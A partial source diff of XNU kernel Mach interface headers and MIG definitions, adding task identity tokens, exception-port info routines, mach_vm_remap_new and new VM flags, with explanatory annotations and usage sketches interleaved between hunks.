+#endif /* KERNEL_SERVER */
+               ;
+
 type thread_t = mach_port_t
 #if    KERNEL_SERVER
                intran: thread_t convert_port_to_thread(mach_port_t)
@@ -578,9 +586,14 @@ type exception_behavior_t  = int;
 
 type    exception_handler_t = mach_port_t;
 
+type    exception_handler_info_t = struct[2] of natural_t;
+
 type   exception_handler_array_t       =
                        array[*:32] of exception_handler_t;
 
+type    exception_handler_info_array_t =
+                       array[*:32] of exception_handler_info_t;
+
 type   exception_behavior_array_t      =
                        array[*:32] of exception_behavior_t;
 
@@ -716,24 +729,25 @@ type dyld_kernel_process_info_t = struct[64] of MACH_MSG_TYPE_BYTE;
 #ifdef MACH_KERNEL_PRIVATE
 simport <ipc/ipc_voucher.h>;   /* for voucher conversions */
 simport <kern/ipc_kobject.h>;  /* for null conversion */
-simport <kern/ipc_tt.h>;       /* for task/thread conversion */
-simport <kern/ipc_host.h>;     /* for host/processor/pset conversions */
+simport <kern/ipc_tt.h>;           /* for task/thread conversion */
+simport <kern/ipc_host.h>;         /* for host/processor/pset conversions */
 simport <kern/ipc_sync.h>;      /* for lock_set and semaphore conversions */
-simport <kern/ledger.h>;       /* for ledger conversions */
-simport <kern/processor.h>;    /* for processor conversions */
-simport <kern/sync_lock.h>;    /* for lock-set conversions */
-simport <kern/sync_sema.h>;    /* for semaphore conversions */
+simport <kern/ledger.h>;           /* for ledger conversions */
+simport <kern/processor.h>;        /* for processor conversions */
+simport <kern/sync_lock.h>;        /* for lock-set conversions */
+simport <kern/sync_sema.h>;        /* for semaphore conversions */
 simport <ipc/ipc_eventlink.h>;  /* for eventlink conversions */
 simport <vm/memory_object.h>;  /* for memory object type conversions */
-simport <vm/vm_map.h>;         /* for vm_map conversions */
+simport <vm/vm_map.h>;             /* for vm_map conversions */
 #if CONFIG_ARCADE
-simport <kern/arcade.h>;    /* for arcade_register conversions */
+simport <kern/arcade.h>;        /* for arcade_register conversions */
 #endif
 #endif /* MACH_KERNEL_PRIVATE */
 
-simport <kern/ipc_mig.h>;      /* pick up kernel-specific MIG things */
+simport <kern/ipc_mig.h>;          /* pick up kernel-specific MIG things */
 
 simport <kern/suid_cred.h>;
+simport <kern/task_ident.h>;    /* for task_id_token conversions */
 #endif /* KERNEL_SERVER */
 
 import <mach/mig.h>;
index bf5c680b20116e027928322a4d471f552203091d..70ff5787524f8ccc579fba9fd4cce4b470963083 100644 (file)
@@ -137,6 +137,7 @@ typedef struct arcade_register          *arcade_register_t;
 typedef struct ipc_eventlink            *ipc_eventlink_t;
 typedef struct ipc_port                 *eventlink_port_pair_t[2];
 typedef struct suid_cred                *suid_cred_t;
+typedef struct task_id_token            *task_id_token_t;
 
 /*
  * OBSOLETE: lock_set interfaces are obsolete.
@@ -203,6 +204,7 @@ typedef mach_port_t             arcade_register_t;
 typedef mach_port_t             ipc_eventlink_t;
 typedef mach_port_t             eventlink_port_pair_t[2];
 typedef mach_port_t             suid_cred_t;
+typedef mach_port_t             task_id_token_t;
 
 #endif  /* KERNEL */
 
@@ -226,6 +228,8 @@ typedef mach_port_t             io_master_t;
 typedef mach_port_t             UNDServerRef;
 typedef mach_port_t             mach_eventlink_t;
 
+typedef ipc_info_port_t         exception_handler_info_t;
+
 /*
  * Mig doesn't translate the components of an array.
  * For example, Mig won't use the thread_t translations
@@ -305,6 +309,7 @@ typedef uint32_t suid_cred_uid_t;
 #define MACH_EVENTLINK_NULL     ((mach_eventlink_t) 0)
 #define IPC_EVENTLINK_NULL      ((ipc_eventlink_t) NULL)
 #define SUID_CRED_NULL          ((suid_cred_t) NULL)
+#define TASK_ID_TOKEN_NULL      ((task_id_token_t) NULL)
 #else
 #define TASK_NULL               ((task_t) 0)
 #define TASK_NAME_NULL          ((task_name_t) 0)
@@ -334,6 +339,7 @@ typedef uint32_t suid_cred_uid_t;
 #define MACH_EVENTLINK_NULL     ((mach_eventlink_t) 0)
 #define IPC_EVENTLINK_NULL      ((ipc_eventlink_t) 0)
 #define SUID_CRED_NULL          ((suid_cred_t) 0)
+#define TASK_ID_TOKEN_NULL      ((task_id_token_t) 0)
 #endif
 
 /* capability strictly _DECREASING_.
@@ -341,19 +347,19 @@ typedef uint32_t suid_cred_uid_t;
  * to be closest to the itk_lock. see task.h.
  */
 typedef unsigned int            mach_task_flavor_t;
-#define TASK_FLAVOR_CONTROL        0    /* a task_t */
+#define TASK_FLAVOR_CONTROL     0    /* a task_t */
 #define TASK_FLAVOR_READ        1    /* a task_read_t */
 #define TASK_FLAVOR_INSPECT     2    /* a task_inspect_t */
 #define TASK_FLAVOR_NAME        3    /* a task_name_t */
 
 /* capability strictly _DECREASING_ */
 typedef unsigned int            mach_thread_flavor_t;
-#define THREAD_FLAVOR_CONTROL    0    /* a thread_t */
+#define THREAD_FLAVOR_CONTROL   0    /* a thread_t */
 #define THREAD_FLAVOR_READ      1    /* a thread_read_t */
 #define THREAD_FLAVOR_INSPECT   2    /* a thread_inspect_t */
 
 /* DEPRECATED */
-typedef natural_t       ledger_item_t;
+typedef natural_t               ledger_item_t;
 #define LEDGER_ITEM_INFINITY    ((ledger_item_t) (~0))
 
 typedef int64_t                 ledger_amount_t;
index 94f3db9181b622477fd7862df362d31a0ea4bcde..df2466fa9fb5c8b9b0cf8b78e696f3e955610aea 100644 (file)
@@ -509,6 +509,30 @@ routine mach_vm_page_range_query(
 skip;
 #endif
 
+/*
+ *      Map portion of a task's address space, {max, cur}_protection is inout.
+ */
+#if !defined(_MACH_VM_PUBLISH_AS_LOCAL_)
+routine PREFIX(KERNEL_SERVER_SUFFIX(mach_vm_remap_new)) (
+#else
+routine PREFIX(KERNEL_SERVER_SUFFIX(vm_remap_new)) (
+#endif
+               target_task     : vm_map_t;
+  inout        target_address  : mach_vm_address_t;
+               size            : mach_vm_size_t;
+               mask            : mach_vm_offset_t;
+               flags           : int;
+#ifdef KERNEL_SERVER
+               src_tport   : mach_port_t;
+#else
+               src_task        : vm_map_read_t;
+#endif
+               src_address     : mach_vm_address_t;
+               copy            : boolean_t;
+  inout        cur_protection  : vm_prot_t;
+  inout        max_protection  : vm_prot_t;
+               inheritance     : vm_inherit_t);
+
 /****************************** Legacy section ***************************/
 /*  The following definitions exist to provide compatibility with        */
 /*  the legacy APIs.  They are no different.  We just need to produce    */
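A rough user-space sketch of the new routine's inout protection semantics (an illustration only: the generated prototype should be checked against <mach/mach_vm.h>, and the helper below is hypothetical):

    #include <mach/mach.h>
    #include <mach/mach_vm.h>

    /* Map a read-only view of another task's memory into this task. */
    static kern_return_t
    remap_read_only_view(task_t src_task, mach_vm_address_t src_addr,
        mach_vm_size_t size, mach_vm_address_t *out_addr)
    {
        /* Unlike legacy mach_vm_remap(), cur/max protection are inout:
         * the caller states the protections it wants before the call. */
        vm_prot_t cur = VM_PROT_READ;
        vm_prot_t max = VM_PROT_READ;

        *out_addr = 0;  /* let the kernel choose the address */
        return mach_vm_remap_new(mach_task_self(), out_addr, size, 0,
            VM_FLAGS_ANYWHERE, src_task, src_addr, FALSE /* copy */,
            &cur, &max, VM_INHERIT_NONE);
    }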
index 3decdd8aa60a4e1e3e3ff3dabea5bf89d5f7c55b..3ec4e987075221504ba9fa5ff90838c0e88c795e 100644 (file)
@@ -66,7 +66,7 @@ routine mach_voucher_attr_command(
 
 /* extract a recipe array to reconstitute all the key values in a future voucher */
 routine mach_voucher_debug_info(
-               task            : ipc_space_t;
+               task            : ipc_space_read_t;
                voucher_name: mach_port_name_t;
        out     recipes         : mach_voucher_attr_raw_recipe_array_t, CountInOut);
 
index b7d4a4659692a4bfbcb38d290ae25e661b86f106..a3f35d645e4e0e240385609b2151757fd1c340f1 100644 (file)
 
 #include <sys/cdefs.h>
 
+#if XNU_KERNEL_PRIVATE
+#include <os/refcnt.h>
+#if __LP64__
+#define MEMORY_OBJECT_HAS_REFCOUNT 1
+#else
+#define MEMORY_OBJECT_HAS_REFCOUNT 0
+#endif
+#endif /* XNU_KERNEL_PRIVATE */
+
 #define VM_64_BIT_DATA_OBJECTS
 
 typedef unsigned long long      memory_object_offset_t;
@@ -100,24 +109,31 @@ typedef natural_t mo_ipc_object_bits_t;
 
 struct memory_object_pager_ops; /* forward declaration */
 
+typedef struct vm_object       *memory_object_control_t;
 /*
- * "memory_object" and "memory_object_control" types used to be Mach ports
- * in user space and can be passed as such to some kernel APIs.
- * Their first field must match the "io_bits" field of a
- * "struct ipc_object" to identify them as a "IKOT_MEMORY_OBJECT" and
- * "IKOT_MEM_OBJ_CONTROL" respectively.
+ * "memory_object" used to be a Mach port in user space and could be passed
+ * as such to some kernel APIs.
+ *
+ * Its first field must match the "io_bits" field of a
+ * "struct ipc_object" to identify them as a "IKOT_MEMORY_OBJECT".
  */
-typedef struct          memory_object {
+typedef struct memory_object {
        mo_ipc_object_bits_t                    mo_ikot; /* DO NOT CHANGE */
+#if __LP64__
+#if XNU_KERNEL_PRIVATE
+       /*
+        * On LP64 there's a 4 byte hole that is perfect for a refcount.
+        * Expose it so that all pagers can take advantage of it.
+        */
+       os_ref_atomic_t                         mo_ref;
+#else
+       unsigned int                            __mo_padding;
+#endif /* XNU_KERNEL_PRIVATE */
+#endif /* __LP64__ */
        const struct memory_object_pager_ops    *mo_pager_ops;
-       struct memory_object_control            *mo_control;
+       memory_object_control_t                 mo_control;
 } *memory_object_t;
 
-typedef struct          memory_object_control {
-       mo_ipc_object_bits_t    moc_ikot; /* DO NOT CHANGE */
-       struct vm_object        *moc_object;
-} *memory_object_control_t;
-
 typedef const struct memory_object_pager_ops {
        void (*memory_object_reference)(
                memory_object_t mem_obj);
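A sketch of how a pager could take advantage of the LP64 refcount hole exposed above (assumptions flagged: "my_pager" is hypothetical, and the raw os_refcnt helper names should be verified against <os/refcnt.h>):

    #include <os/refcnt.h>

    /* hypothetical pager embedding the shared header */
    struct my_pager {
        struct memory_object    mp_header;   /* mo_ref sits in the former padding */
        /* ... pager-private state ... */
    };

    static void
    my_pager_reference(memory_object_t mem_obj)
    {
    #if MEMORY_OBJECT_HAS_REFCOUNT
        os_ref_retain_raw(&mem_obj->mo_ref, NULL);   /* shared header refcount */
    #else
        /* ILP32: keep a pager-private reference count instead */
    #endif
    }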
@@ -177,6 +193,11 @@ typedef const struct memory_object_pager_ops {
 #else   /* KERNEL_PRIVATE */
 
 typedef mach_port_t     memory_object_t;
+/*
+ * Vestigial, maintained for source compatibility;
+ * no MIG interface will accept or return non-NULL
+ * objects of this type.
+ */
 typedef mach_port_t     memory_object_control_t;
 
 #endif  /* KERNEL_PRIVATE */
@@ -441,10 +462,8 @@ typedef struct memory_object_attr_info  memory_object_attr_info_data_t;
 #define MAX_UPL_TRANSFER_BYTES  (1024 * 1024)
 #define MAX_UPL_SIZE_BYTES      (1024 * 1024 * 64)
 
-#ifndef CONFIG_EMBEDDED
 #define MAX_UPL_SIZE            (MAX_UPL_SIZE_BYTES / PAGE_SIZE)
 #define MAX_UPL_TRANSFER        (MAX_UPL_TRANSFER_BYTES / PAGE_SIZE)
-#endif
 
 struct upl_page_info {
        ppnum_t         phys_addr;      /* physical page index number */
index a70035eddb0cc31b99f951739025ffae26747b5a..9472cecea7c2395232a6cc6bdc0b14046ff54719 100644 (file)
@@ -142,8 +142,13 @@ typedef struct ipc_port         *ipc_port_t;
 
 #define IPC_PORT_NULL           ((ipc_port_t) NULL)
 #define IPC_PORT_DEAD           ((ipc_port_t)~0UL)
-#define IPC_PORT_VALID(port) \
-       ((port) != IPC_PORT_NULL && (port) != IPC_PORT_DEAD)
+#define IPC_PORT_VALID(port)    ipc_port_valid(port)
+
+static inline boolean_t
+ipc_port_valid(ipc_port_t port)
+{
+       return port != IPC_PORT_DEAD && port;
+}
 
 typedef ipc_port_t              mach_port_t;
 
@@ -269,7 +274,6 @@ typedef mach_port_type_t *mach_port_type_array_t;
 #define MACH_PORT_TYPE_DEAD_NAME    MACH_PORT_TYPE(MACH_PORT_RIGHT_DEAD_NAME)
 #define MACH_PORT_TYPE_LABELH       MACH_PORT_TYPE(MACH_PORT_RIGHT_LABELH) /* obsolete */
 
-
 #ifdef MACH_KERNEL_PRIVATE
 /* Holder used to have a receive right - remembered to filter exceptions */
 #define MACH_PORT_TYPE_EX_RECEIVE   MACH_PORT_TYPE_LABELH
@@ -451,9 +455,16 @@ enum mach_port_guard_exception_codes {
        kGUARD_EXC_SEND_INVALID_RIGHT    = 1u << 18,
        kGUARD_EXC_RCV_INVALID_NAME      = 1u << 19,
        kGUARD_EXC_RCV_GUARDED_DESC      = 1u << 20, /* should never be fatal; for development only */
+       kGUARD_EXC_MOD_REFS_NON_FATAL    = 1u << 21,
+       kGUARD_EXC_IMMOVABLE_NON_FATAL   = 1u << 22,
 };
 
-#define MAX_FATAL_kGUARD_EXC_CODE (1u << 6)
+#define MAX_FATAL_kGUARD_EXC_CODE (1u << 7)
+
+/*
+ * Mach port guard flags.
+ */
+#define MPG_FLAGS_NONE                             (0x00ull)
 
 /*
  * These flags are used as bits in the subcode of kGUARD_EXC_STRICT_REPLY exceptions.
@@ -465,6 +476,16 @@ enum mach_port_guard_exception_codes {
 #define MPG_FLAGS_STRICT_REPLY_MISMATCHED_PERSONA  (0x10ull << 56)
 #define MPG_FLAGS_STRICT_REPLY_MASK                (0xffull << 56)
 
+/*
+ * These flags are used as bits in the subcode of kGUARD_EXC_MOD_REFS exceptions.
+ */
+#define MPG_FLAGS_MOD_REFS_PINNED_DEALLOC          (0x01ull << 56)
+
+/*
+ * These flags are used as bits in the subcode of kGUARD_EXC_IMMOVABLE exceptions.
+ */
+#define MPG_FLAGS_IMMOVABLE_PINNED                 (0x01ull << 56)
+
 /*
  * Flags for mach_port_guard_with_flags. These flags extend
  * the attributes associated with a guarded port.
index dd9bd8404bb44c73daee894beb2bdd57a51fd2b0..72719058192e58c69995c78ca6205f8363d7d944 100644 (file)
@@ -86,6 +86,7 @@
 kernel_trap(_kernelrpc_mach_vm_allocate_trap,-10,5) /* 4 args, +1 for mach_vm_size_t */
 kernel_trap(_kernelrpc_mach_vm_purgable_control_trap,-11,5) /* 4 args, +1 for mach_vm_offset_t */
 kernel_trap(_kernelrpc_mach_vm_deallocate_trap,-12,5) /* 3 args, +2 for mach_vm_size_t and mach_vm_address_t */
+kernel_trap(task_dyld_process_info_notify_get,-13,4) /* 2 args, +2 for mach_vm_address_t */
 kernel_trap(_kernelrpc_mach_vm_protect_trap,-14,7) /* 5 args, +2 for mach_vm_address_t and mach_vm_size_t */
 kernel_trap(_kernelrpc_mach_vm_map_trap,-15,9)
 kernel_trap(_kernelrpc_mach_port_allocate_trap,-16,3)
index 9e82450c76ae9b158bfa4f30090d7903194ec5ec..fb6beab76ec967fd430b8cf733234ba1d90c5077 100644 (file)
@@ -72,6 +72,12 @@ subsystem
 #include <mach/mach_types.defs>
 #include <mach_debug/mach_debug_types.defs>
 
+#if !KERNEL && !LIBSYSCALL_INTERFACE
+#define PREFIX(NAME) _kernelrpc_ ## NAME
+#else
+#define PREFIX(NAME) NAME
+#endif
+
 /*
  *     Create a new task with an empty set of IPC rights,
  *     and having an address space constructed from the
@@ -153,7 +159,7 @@ routine     task_set_info(
  *     count for that task is non-zero.
  */
 routine        task_suspend(
-               target_task     : task_t);
+               target_task     : task_read_t);
 
 
 /*
@@ -163,7 +169,7 @@ routine     task_suspend(
  *     that also have non-zero suspend counts may execute.
  */
 routine        task_resume(
-               target_task     : task_t);
+               target_task     : task_read_t);
 
 /*
  *     Returns the current value of the selected special port
@@ -266,7 +272,7 @@ routine     task_swap_exception_ports(
                behavior        : exception_behavior_t;
                new_flavor      : thread_state_flavor_t;
          out   masks           : exception_mask_array_t;
-         out   old_handlerss   : exception_handler_array_t, SameCount;
+         out   old_handlers    : exception_handler_array_t, SameCount;
          out   old_behaviors   : exception_behavior_array_t, SameCount;
          out   old_flavors     : exception_flavor_array_t, SameCount);
 
@@ -455,7 +461,7 @@ routine task_set_phys_footprint_limit(
        out old_limit   : int);
 
 routine task_suspend2(
-               target_task : task_t;
+               target_task : task_read_t;
        out suspend_token : task_suspension_token_t);
 
 routine task_resume2(
@@ -480,7 +486,7 @@ routine task_swap_mach_voucher(
        inout   old_voucher     : ipc_voucher_t);
 
 routine task_generate_corpse(
-               task            :task_t;
+               task            :task_read_t;
        out     corpse_task_port:mach_port_t);
 
 routine task_map_corpse_info(
@@ -540,5 +546,39 @@ routine task_create_suid_cred(
                uid             : suid_cred_uid_t;
        out     delegation      : suid_cred_t);
 
+#if KERNEL || (!KERNEL && !LIBSYSCALL_INTERFACE)
+routine PREFIX(mach_task_is_self)(
+               task     : task_name_t;
+       out is_self  : boolean_t);
+#else
+       /* Do not generate header, use the one in mach_init.h */
+       skip;
+#endif
+
+routine task_dyld_process_info_notify_register(
+               target_task : task_read_t;
+               notify          : mach_port_make_send_t);
+
+routine task_create_identity_token(
+           task     : task_t;
+       out     token    : task_id_token_t);
+
+routine task_identity_token_get_task_port(
+           token    : task_id_token_t;
+               flavor   : task_flavor_t;
+       out task_port: mach_port_t);
+
+routine task_dyld_process_info_notify_deregister(
+               target_task : task_read_t;
+               notify          : mach_port_name_t);
+
+routine task_get_exception_ports_info(
+               port : mach_port_t;
+               exception_mask  : exception_mask_t;
+       out     masks           : exception_mask_array_t;
+       out     old_handlers_info       : exception_handler_info_array_t, SameCount;
+       out     old_behaviors   : exception_behavior_array_t, SameCount;
+       out     old_flavors     : exception_flavor_array_t, SameCount);
+       
 /* vim: set ft=c : */
 
index 1696fd3cf235ccbc1d0fc9662cea5e6f572a4be1..8974f5dd692095cff86d61e72c616d3427da4d63 100644 (file)
@@ -56,4 +56,12 @@ routine find_code_signature(
                task_access_port                        : mach_port_t;
                new_pid                                 : int32_t);
 
+routine check_task_access_with_flavor(
+               task_access_port                        : mach_port_t;
+               calling_pid                             : int32_t;
+               calling_gid                             : uint32_t;
+               target_pid                              : int32_t;
+               flavor                  : mach_task_flavor_t;
+               ServerAuditToken        caller_cred     : audit_token_t);
+
 /* vim: set ft=c : */
index a2840ed89c9d9cbdf42665256af65910939061b5..fa561750fdee565b9f87088ef7576a378809a879 100644 (file)
@@ -81,7 +81,9 @@ typedef int     task_special_port_t;
 
 #define TASK_READ_PORT          6       /* The read port for task. */
 
-
+/*
+ * Evolving and likely to change.
+ */
 
 #define TASK_SEATBELT_PORT      7       /* Seatbelt compiler/DEM port for task. */
 
index e7f20e54cdc6a787142639dc395315821070dc03..162f0f54bbe107260fe5ed84edc4ab7d04c302aa 100644 (file)
@@ -164,14 +164,14 @@ thread_set_state(
  *     for its task is also zero.
  */
 routine        thread_suspend(
-               target_act      : thread_act_t);
+               target_act      : thread_read_t);
 
 /*
  *     Decrement the suspend count for the target thread,
  *     if that count is not already zero.
  */
 routine        thread_resume(
-               target_act      : thread_act_t);
+               target_act      : thread_read_t);
 
 /*
  *     Cause any user or meta- instructions currently being
@@ -385,6 +385,17 @@ routine thread_convert_thread_state(
        out     out_state       : thread_state_t, CountInOut);
 
 #ifdef XNU_KERNEL_PRIVATE
-#endif
+       skip;
+#else
+       skip;
+#endif /* XNU_KERNEL_PRIVATE */
+
+routine thread_get_exception_ports_info(
+               port : mach_port_t;
+               exception_mask  : exception_mask_t;
+       out     masks           : exception_mask_array_t;
+       out     old_handlers_info       : exception_handler_info_array_t, SameCount;
+       out     old_behaviors   : exception_behavior_array_t, SameCount;
+       out     old_flavors     : exception_flavor_array_t, SameCount);
 
 /* vim: set ft=c : */
index 7bb1bea5ae3d7b35b947346521503385c255e24e..1a24db516ce7f364c6b4a93fe257e01b81f6d494 100644 (file)
@@ -73,6 +73,7 @@
 
 #define THREAD_READ_PORT        3       /* The read port for thread. */
 
+#define THREAD_MAX_SPECIAL_PORT THREAD_READ_PORT
 /*
  *     Definitions for ease of use
  */
index 7caa92639bf8e55eb53620aa1f0ee6082c571bb4..14f172e4b4bd2ef9d4acaf05d78e099548b591f3 100644 (file)
@@ -506,5 +506,21 @@ routine PREFIX(vm_purgable_control) (
 routine vm_map_exec_lockdown(
                target_task     : vm_map_t);
 
+routine PREFIX(KERNEL_SERVER_SUFFIX(vm_remap_new)) (
+               target_task     : vm_map_t;
+inout  target_address  : vm_address_t;
+               size            : vm_size_t;
+               mask            : vm_address_t;
+               flags           : int;
+#ifdef KERNEL_SERVER
+               src_tport   : mach_port_t;
+#else
+               src_task        : vm_map_read_t;
+#endif
+               src_address     : vm_address_t;
+               copy            : boolean_t;
+inout  cur_protection  : vm_prot_t;
+inout  max_protection  : vm_prot_t;
+               inheritance     : vm_inherit_t);
 
 /* vim: set ft=c : */
index 9a518a2bbe02a38ec61498213107416712588439..e87b5d1b76543d1c19ca9845023d7edb1474ab1c 100644 (file)
@@ -242,7 +242,7 @@ extern uint64_t         max_mem;                /* 64-bit size of memory - limit
  * When we need to allocate a chunk of anonymous memory over that size,
  * we have to allocate more than one chunk.
  */
-#define ANON_MAX_SIZE   0xFFFFF000ULL
+#define ANON_MAX_SIZE   ((1ULL << 32) - PAGE_SIZE)
 /*
  * Work-around for <rdar://problem/6626493>
  * Break large anonymous memory areas into 128MB chunks to alleviate
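Worked out for reference: with a 4 KiB PAGE_SIZE, (1ULL << 32) - PAGE_SIZE = 0x100000000 - 0x1000 = 0xFFFFF000, i.e. exactly the constant being replaced; with a 16 KiB PAGE_SIZE the limit becomes 0xFFFFC000, which appears to be the point of expressing it in terms of PAGE_SIZE rather than hard-coding it.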
index 3de12866967683d1c919fabf62e78fd303f36de5..f3038106efa4d4f8fd963cfd284e082025454d88 100644 (file)
@@ -309,6 +309,7 @@ typedef struct pmap_statistics  *pmap_statistics_t;
 #define VM_FLAGS_NO_CACHE       0x0010
 #define VM_FLAGS_RESILIENT_CODESIGN     0x0020
 #define VM_FLAGS_RESILIENT_MEDIA        0x0040
+#define VM_FLAGS_PERMANENT      0x0080
 #define VM_FLAGS_OVERWRITE      0x4000  /* delete any existing mappings first */
 /*
  * VM_FLAGS_SUPERPAGE_MASK
@@ -334,6 +335,7 @@ typedef struct pmap_statistics  *pmap_statistics_t;
                                 VM_FLAGS_4GB_CHUNK |           \
                                 VM_FLAGS_RANDOM_ADDR |         \
                                 VM_FLAGS_NO_CACHE |            \
+                                VM_FLAGS_PERMANENT |           \
                                 VM_FLAGS_OVERWRITE |           \
                                 VM_FLAGS_SUPERPAGE_MASK |      \
                                 VM_FLAGS_ALIAS_MASK)
@@ -688,8 +690,9 @@ typedef struct {
 #define VM_KERN_MEMORY_SKYWALK          26
 #define VM_KERN_MEMORY_LTABLE           27
 #define VM_KERN_MEMORY_HV               28
+#define VM_KERN_MEMORY_RETIRED          29
 
-#define VM_KERN_MEMORY_FIRST_DYNAMIC    29
+#define VM_KERN_MEMORY_FIRST_DYNAMIC    30
 /* out of tags: */
 #define VM_KERN_MEMORY_ANY              255
 #define VM_KERN_MEMORY_COUNT            256
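
VM_FLAGS_PERMANENT takes the 0x0080 bit and is OR'd into the flags mask in the second hunk, so it
can be passed through the mach_vm_map()/mach_vm_allocate() family; VM_KERN_MEMORY_RETIRED becomes
kernel allocation tag 29, pushing the first dynamic tag to 30. A minimal sketch of passing the new
flag; this hunk only defines the bit, so reading it as "a mapping the task cannot later tear down"
is an assumption:

#include <mach/mach.h>
#include <mach/mach_vm.h>

/* Hypothetical: reserve one anonymous page flagged VM_FLAGS_PERMANENT. */
static kern_return_t
map_permanent_page(mach_vm_address_t *addr)
{
        *addr = 0;
        return mach_vm_map(mach_task_self(), addr, vm_page_size, 0 /* mask */,
            VM_FLAGS_ANYWHERE | VM_FLAGS_PERMANENT,
            MACH_PORT_NULL, 0, FALSE /* copy */,
            VM_PROT_DEFAULT, VM_PROT_ALL, VM_INHERIT_DEFAULT);
}
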
index e29742be6cc4f90d588d40b725da67b56b8d0944..2b02e84a5017cc6dcb4ef1a358a0d73736950534 100644 (file)
@@ -160,10 +160,8 @@ struct vm_allocation_total {
 };
 
 struct vm_allocation_zone_total {
-       uint64_t  total;
-       uint64_t  peak;
-       uint32_t  waste;
-       uint32_t  wastediv;
+       vm_size_t vazt_total;
+       vm_size_t vazt_peak;
 };
 typedef struct vm_allocation_zone_total vm_allocation_zone_total_t;
 
index 520830894a95b65f8a67cc268eec5e077716b5a1..c0e387b16f175ff46844c906df4bc77d1a7a831c 100644 (file)
@@ -113,4 +113,11 @@ typedef struct ipc_info_tree_name {
 
 typedef ipc_info_tree_name_t *ipc_info_tree_name_array_t;
 
+typedef struct ipc_info_port {
+       natural_t iip_port_object;      /* port object identifier */
+       natural_t iip_receiver_object;  /* receiver task identifier (if any) */
+} ipc_info_port_t;
+
+typedef ipc_info_port_t *exception_handler_info_array_t;
+
 #endif  /* _MACH_DEBUG_IPC_INFO_H_ */
index 40eae37e9eaa21a9971042f8cf3a9df3fd593968..7f2508772c40d38b072e302b235f7eaf0ea94bc5 100644 (file)
@@ -51,13 +51,6 @@ __BEGIN_DECLS
  */
 bool ml_cpu_can_exit(int cpu_id);
 
-/*!
- * @function      ml_cpu_init_state
- * @brief         Needs to be called from schedulable context prior to using
- *                the ml_cpu_*_state_transition or ml_cpu_*_loop functions.
- */
-void ml_cpu_init_state(void);
-
 /*!
  * @function      ml_cpu_begin_state_transition
  * @brief         Tell the platform code that processor_start() or
index 9ff80bc284b43773bf4698e6a25ddd24f86ab810..f6ccb2bead6a22ba9dab9667d9e91900917adca5 100644 (file)
@@ -46,8 +46,8 @@ values are:
 <dt> <strong>TASK_KERNEL_PORT</strong>
 <dd>
 [task-self send right] The port used to control this task.  Used 
-to send messages that affect the task.  This is the port returned
-by <strong>mach_task_self</strong>.
+to send messages that affect the task.  This is the movable task port and
+different from the one returned by <strong>mach_task_self</strong> (immovable).
 <p>
 <dt> <strong>TASK_BOOTSTRAP_PORT</strong>
 <dd>
index 55cc0d71668f5af421b731f3865a03aa80ae2c96..1cabc6171d918097793fdc979fb0831b77068cad 100644 (file)
@@ -51,10 +51,10 @@ messages requesting return of other system service ports.
 <dt> <strong>TASK_KERNEL_PORT</strong>
 <dd>
 [task-self send right] The task's kernel port.  Used by the
-kernel to receive messages to manipulate the task.  This is the 
-port returned by <strong>mach_task_self</strong>.  Setting this special port 
-does not change the identity of the kernel port that names the 
-task; this simply changes the value returned as the kernel
+kernel to receive messages to manipulate the task. This is the movable task 
+port and different from the one returned by <strong>mach_task_self</strong> 
+(immovable). Setting this special port does not change the identity of the 
+kernel port that names the task; this simply changes the value returned as the kernel
 special port.
 <p>
 <dt> <strong>TASK_HOST_NAME_PORT</strong>
index f8e0abba6a10ab6e571fbf26a5bbba0349abb111..ee0639063540045eca95e7017dc9020f568b1fc7 100644 (file)
@@ -36,8 +36,8 @@ values are:
 <dt> <strong>THREAD_KERNEL_PORT</strong>
 <dd>
 [thread-self send right] The port used to name the thread. 
-Used to invoke operations that affect the thread.  This is the 
-port returned by <strong>mach_thread_self</strong>.
+Used to invoke operations that affect the thread. This is the movable
+port for the thread and different from <strong>mach_thread_self</strong> (immovable).
 </dl>
 <p>
 <dt> <var>special_port</var> 
index 251d27536d32e7a31bfc0ae3155b3adb3b3899b6..9fa9605b87930d67b86fe8a1b6cb55405f42b179 100644 (file)
@@ -33,8 +33,8 @@ The special port to be set.  Valid values are:
 <dt> <strong>THREAD_KERNEL_PORT</strong>
 <dd>
 [thread-self port] The thread's kernel port.  Used by the kernel 
-to receive messages from the thread.  This is the port returned 
-by <strong>mach_thread_self</strong>.
+to receive messages from the thread.  This is the movable
+port for the thread and different from <strong>mach_thread_self</strong> (immovable).
 </dl>
 <p>
 <dt> <var>special_port</var> 
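
All four man pages above now make the same point: TASK_KERNEL_PORT and THREAD_KERNEL_PORT name the
movable control ports, which differ from the immovable ports returned by mach_task_self() and
mach_thread_self(). A small sketch that makes the distinction observable for the task case; the
thread case is identical with thread_get_special_port() and mach_thread_self():

#include <mach/mach.h>
#include <stdio.h>

int
main(void)
{
        mach_port_t movable = MACH_PORT_NULL;
        kern_return_t kr = task_get_special_port(mach_task_self(),
            TASK_KERNEL_PORT, &movable);

        if (kr == KERN_SUCCESS) {
                /* The movable port generally has a different name than the
                 * immovable self port returned by mach_task_self(). */
                printf("mach_task_self() = 0x%x, TASK_KERNEL_PORT = 0x%x\n",
                    mach_task_self(), movable);
                mach_port_deallocate(mach_task_self(), movable);
        }
        return 0;
}
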
index ea1ac1dfec195b0824678c9793735e9464ccfe98..18a8134a3c2aa2007783ae506fa0717e597c385d 100644 (file)
@@ -37,7 +37,6 @@
 #include <kern/misc_protos.h>
 #include <pexpert/pexpert.h>
 #include <prng/entropy.h>
-#include <crypto/entropy/entropy_sysctl.h>
 #include <machine/machine_routines.h>
 #include <libkern/section_keywords.h>
 #include <sys/cdefs.h>
@@ -160,7 +159,6 @@ entropy_analysis_init(uint32_t sample_count)
        entropy_analysis_max_sample_count = sample_count;
        entropy_analysis_buffer_size = sample_count * sizeof(entropy_sample_t);
        entropy_analysis_buffer = zalloc_permanent(entropy_analysis_buffer_size, ZALIGN(entropy_sample_t));
-       entropy_analysis_register_sysctls();
 }
 
 __startup_func
index 9d8d80b13594fd256da0bd77c8462b6f5f387892..074e0a67f00c73c13246a49936f2ec437738d475 100644 (file)
@@ -32,6 +32,7 @@
 #include <tests/xnupost.h>
 #include <kern/kalloc.h>
 #include <kern/bits.h>
+#include <pexpert/pexpert.h>
 
 extern void dump_bitmap_next(bitmap_t *map, uint nbits);
 extern void dump_bitmap_lsb(bitmap_t *map, uint nbits);
@@ -117,7 +118,57 @@ test_bitmap(void)
                assert(bitmap_first(map, nbits) == -1);
                assert(bitmap_lsb_first(map, nbits) == -1);
 
+               /* bitmap_not */
+               bitmap_not(map, map, nbits);
+               assert(bitmap_is_full(map, nbits));
+
+               bitmap_not(map, map, nbits);
+               assert(bitmap_first(map, nbits) == -1);
